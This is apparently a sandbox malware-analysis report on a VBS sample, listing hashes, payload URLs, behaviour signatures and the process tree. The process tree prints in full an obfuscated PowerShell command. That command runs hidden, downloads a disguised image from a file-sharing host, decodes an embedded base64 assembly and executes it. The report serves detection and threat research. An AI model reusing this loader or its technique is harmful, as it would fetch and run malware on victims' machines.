Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
14-11-2024 15:57
Static task
static1
Behavioral task
behavioral1
Sample
INQ02010391.vbs
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
INQ02010391.vbs
Resource
win10v2004-20241007-en
General
-
Target
INQ02010391.vbs
-
Size
137KB
-
MD5
ed54f068782aaff84dce2776a3ffbd73
-
SHA1
48a75d4b075131bf9abcfb3b77e64ace881f1b8e
-
SHA256
64c7c1b70a135415a835bb48c638ca47db929b1df28bb62aaacd9cdcac76553b
-
SHA512
9397d85e1e20b36736b6780fe7af5b3b5309ca2096368f3d99d3de3bbdfe348bb55854aef7a726ba55ac4210e19c2ab00bf82dae82a67354c50476217db90ba6
-
SSDEEP
3072:SXs3fFf2ghaYlNAuaq/XDptbxILKDngt5pPGwm:SXSf4eJA0XDjbKG
Malware Config
Extracted
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 1668 powershell.exe 6 1668 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2672 powershell.exe 1668 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2672 powershell.exe 1668 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2672 powershell.exe Token: SeDebugPrivilege 1668 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1776 wrote to memory of 2672 1776 WScript.exe 30 PID 1776 wrote to memory of 2672 1776 WScript.exe 30 PID 1776 wrote to memory of 2672 1776 WScript.exe 30 PID 2672 wrote to memory of 1668 2672 powershell.exe 32 PID 2672 wrote to memory of 1668 2672 powershell.exe 32 PID 2672 wrote to memory of 1668 2672 powershell.exe 32
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INQ02010391.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKMFFpbWFnZVVybCA9IEk5Ymh0dHBzOi8nKycvMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXJysnbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDJysnNlNRdCcrJ0ljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgSTliO0owUXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7SjBRaW1hZ2VCeScrJ3RlcyA9IEonKycwUXdlYkNsaWVudC5EJysnb3dubG9hZERhdGEoSjBRaW1hZ2VVcmwpO0owUWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKEowUWltYScrJ2dlQnl0ZXMpO0owUXN0YScrJ3J0RmxhZyA9IEk5Yjw8QkFTRTYnKyc0X1MnKydUQVJUPj5JOWI7SjBRZW5kRmxhZyA9IEk5Yjw8QkFTRTY0X0VORD4+STliO0owUXN0YXJ0SW5kZXggPSBKMFEnKydpJysnbWFnZVRleHQuSW5kZXhPZihKMFFzdGFyJysndEZsYWcpOycrJ0owUWVuZEluZGV4ID0gSjBRaW1hZ2VUZXh0LkluZGV4T2YoSjBRZW5kRmxhZyk7SjBRc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIEowUWVuZEluZGV4IC1ndCBKMFFzdGFydEluZGV4O0owUXN0YXJ0SW5kZXgnKycgKz0gSjBRc3RhcnRGbGFnLkxlbmd0aDtKMFFiYXNlNjRMZW5ndGggPSBKMFFlbmRJbmRleCAtIEowUXN0YXJ0SW5kZXg7SjBRYicrJ2FzZTY0Q29tbWFuZCA9IEowUWltYWdlVGV4dC5TdWJzdHJpbmcnKycoSjBRc3RhcnRJbmRleCwgSjBRYmFzZTY0TGVuZ3RoKTtKMFFiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChKMFFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgRW04IEZvckVhY2gtT2JqZWN0IHsgSjBRXyB9KVstMS4uLShKMFFiYXNlNjRDb21tYW5kLkxlbmd0aCldO0owUWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoSjBRYmFzZTY0UmV2ZXJzZWQpO0owUWxvYScrJ2RlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChKMFFjb21tYW5kQnl0ZXMpO0owUXZhaU1ldGhvZCAnKyc9IFtkbicrJ2xpYi5JTy5Ib21lXS5HZXRNZXRob2QoSTliVkFJSTliKTtKMFF2YWlNZXRob2QuSW52b2tlKEowUW51bGwsIEAoSTlidHh0LmNlYS92ZWQuMnIuZDQzOGY3MScrJzU1Y2M2ZWVhOTJkMTRlNjA3NycrJzM3MjgxYzQtYnVwLy86c3B0dGhJOWIsIEk5YmRlc2F0aXZhZG9JOWIsIEk5YmRlc2F0aXZhZG9JOWIsIEk5YmRlc2F0aXZhZG9JOWIsIEk5Yk1TQnVpbGRJOWIsIEk5YmRlc2F0aXYnKydhZG9JOWIsIEk5YmRlc2F0aXZhZG9JOWIsSTliZGVzYXRpdmFkb0k5YixJOWJkZXNhdGl2YWRvSTliLEk5YmRlc2F0aXZhZG9JOWIsSTliZGVzYXRpdicrJ2Fkb0k5YixJOWJkZXNhdGl2YWRvSTliLEk5YjFJOWIsSTliZGVzYXRpdmFkb0k5YikpOycpLlJlUGxBQ2UoJ0owUScsW1N0UmlOZ11bY2hhcl0zNikuUmVQbEFDZSgnSTliJyxbU3RSaU5nXVtjaGFyXTM5KS5SZVBsQUNlKChbY2hhcl02OStbY2hhcl0xMDkrW2NoYXJdNTYpLFtTdFJpTmddW2NoYXJdMTI0KXxJRXg=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('J0QimageUrl = I9bhttps:/'+'/1017.filemail.com/api/file/get?filekey=2Aa_bW'+'o9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC'+'6SQt'+'IcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f I9b;J0QwebClient = New-Object System.Net.WebClient;J0QimageBy'+'tes = J'+'0QwebClient.D'+'ownloadData(J0QimageUrl);J0QimageText = [System.Text.Encoding]::UTF8.GetString(J0Qima'+'geBytes);J0Qsta'+'rtFlag = I9b<<BASE6'+'4_S'+'TART>>I9b;J0QendFlag = I9b<<BASE64_END>>I9b;J0QstartIndex = J0Q'+'i'+'mageText.IndexOf(J0Qstar'+'tFlag);'+'J0QendIndex = J0QimageText.IndexOf(J0QendFlag);J0QstartIndex -ge 0 -an'+'d J0QendIndex -gt J0QstartIndex;J0QstartIndex'+' += J0QstartFlag.Length;J0Qbase64Length = J0QendIndex - J0QstartIndex;J0Qb'+'ase64Command = J0QimageText.Substring'+'(J0QstartIndex, J0Qbase64Length);J0Qbase64Reversed = -join (J0Qbase64Command.ToCharArray() Em8 ForEach-Object { J0Q_ })[-1..-(J0Qbase64Command.Length)];J0QcommandBytes = [System.Convert]::FromBase64String(J0Qbase64Reversed);J0Qloa'+'dedAs'+'sembly = [System.Reflection.Assembly]::Load(J0QcommandBytes);J0QvaiMethod '+'= [dn'+'lib.IO.Home].GetMethod(I9bVAII9b);J0QvaiMethod.Invoke(J0Qnull, @(I9btxt.cea/ved.2r.d438f71'+'55cc6eea92d14e6077'+'37281c4-bup//:sptthI9b, I9bdesativadoI9b, I9bdesativadoI9b, I9bdesativadoI9b, I9bMSBuildI9b, I9bdesativ'+'adoI9b, I9bdesativadoI9b,I9bdesativadoI9b,I9bdesativadoI9b,I9bdesativadoI9b,I9bdesativ'+'adoI9b,I9bdesativadoI9b,I9b1I9b,I9bdesativadoI9b));').RePlACe('J0Q',[StRiNg][char]36).RePlACe('I9b',[StRiNg][char]39).RePlACe(([char]69+[char]109+[char]56),[StRiNg][char]124)|IEx"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1668
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5bc940bd93a8bf83d9f1544d4c3575e31
SHA1e644fd2ebe7dba0ebb54af653d69559389955247
SHA256a1539573641a04d6093d48b9fd2292920f268fb6173a3423cf10a406e667309d
SHA5123cbe7116201dd67c4f11d98a7b6925555920f6b7ccb9a4a82480426762d80418e2d1e025c480cebe40e43e08071c34575d4ced7222b8c75451ceb7e05bb028dd